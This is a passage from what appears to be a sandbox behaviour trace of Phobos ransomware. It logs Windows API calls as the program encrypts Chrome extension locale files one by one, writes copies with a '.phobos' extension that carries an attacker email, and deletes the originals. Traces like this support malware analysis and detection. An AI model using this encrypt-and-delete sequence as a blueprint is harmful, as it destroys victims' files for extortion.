HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\et\\messages.json")) returned 1 [0152.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.287] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=220) returned 1 [0152.287] CloseHandle (hObject=0x188) returned 1 [0152.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json")) returned 0x2020 [0152.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.288] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.288] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.288] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.288] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.288] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdc, lpOverlapped=0x0) returned 1 [0152.289] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0152.289] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0152.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.290] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.290] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.290] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.290] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.290] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.290] CloseHandle (hObject=0x188) returned 1 [0152.290] CloseHandle (hObject=0x148) returned 1 [0152.290] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json")) returned 1 [0152.291] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.292] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=223) returned 1 [0152.292] CloseHandle (hObject=0x148) returned 1 [0152.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json")) returned 0x2020 [0152.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.292] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.292] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.292] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.293] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.293] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xdf, lpOverlapped=0x0) returned 1 [0152.293] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0152.293] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0152.294] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.294] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.295] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.295] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.295] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.295] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.295] CloseHandle (hObject=0x148) returned 1 [0152.295] CloseHandle (hObject=0x188) returned 1 [0152.295] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fil\\messages.json")) returned 1 [0152.296] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.296] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=226) returned 1 [0152.296] CloseHandle (hObject=0x188) returned 1 [0152.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json")) returned 0x2020 [0152.297] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.297] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.297] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.297] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.297] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe2, lpOverlapped=0x0) returned 1 [0152.298] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0152.298] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0152.299] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.299] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.299] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.299] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.299] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.299] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.299] CloseHandle (hObject=0x188) returned 1 [0152.299] CloseHandle (hObject=0x148) returned 1 [0152.300] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\messages.json")) returned 1 [0152.300] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.301] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=238) returned 1 [0152.301] CloseHandle (hObject=0x148) returned 1 [0152.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json")) returned 0x2020 [0152.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0152.301] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.301] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0152.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.302] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0152.302] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.302] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xee, lpOverlapped=0x0) returned 1 [0152.303] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0152.303] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0152.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0152.303] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0152.303] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0152.303] CryptDestroyKey (hKey=0xa32d28) returned 1 [0152.303] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0152.304] CryptDestroyKey (hKey=0xa32c28) returned 1 [0152.304] CloseHandle (hObject=0x148) returned 1 [0152.304] CloseHandle (hObject=0x188) returned 1 [0152.304] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\he\\messages.json")) returned 1 [0152.305] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0152.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0152.305] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=282) returned 1 [0152.305] CloseHandle (hObject=0x188) returned 1 [0152.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json")) returned 0x2020 [0152.305] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0152.306] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 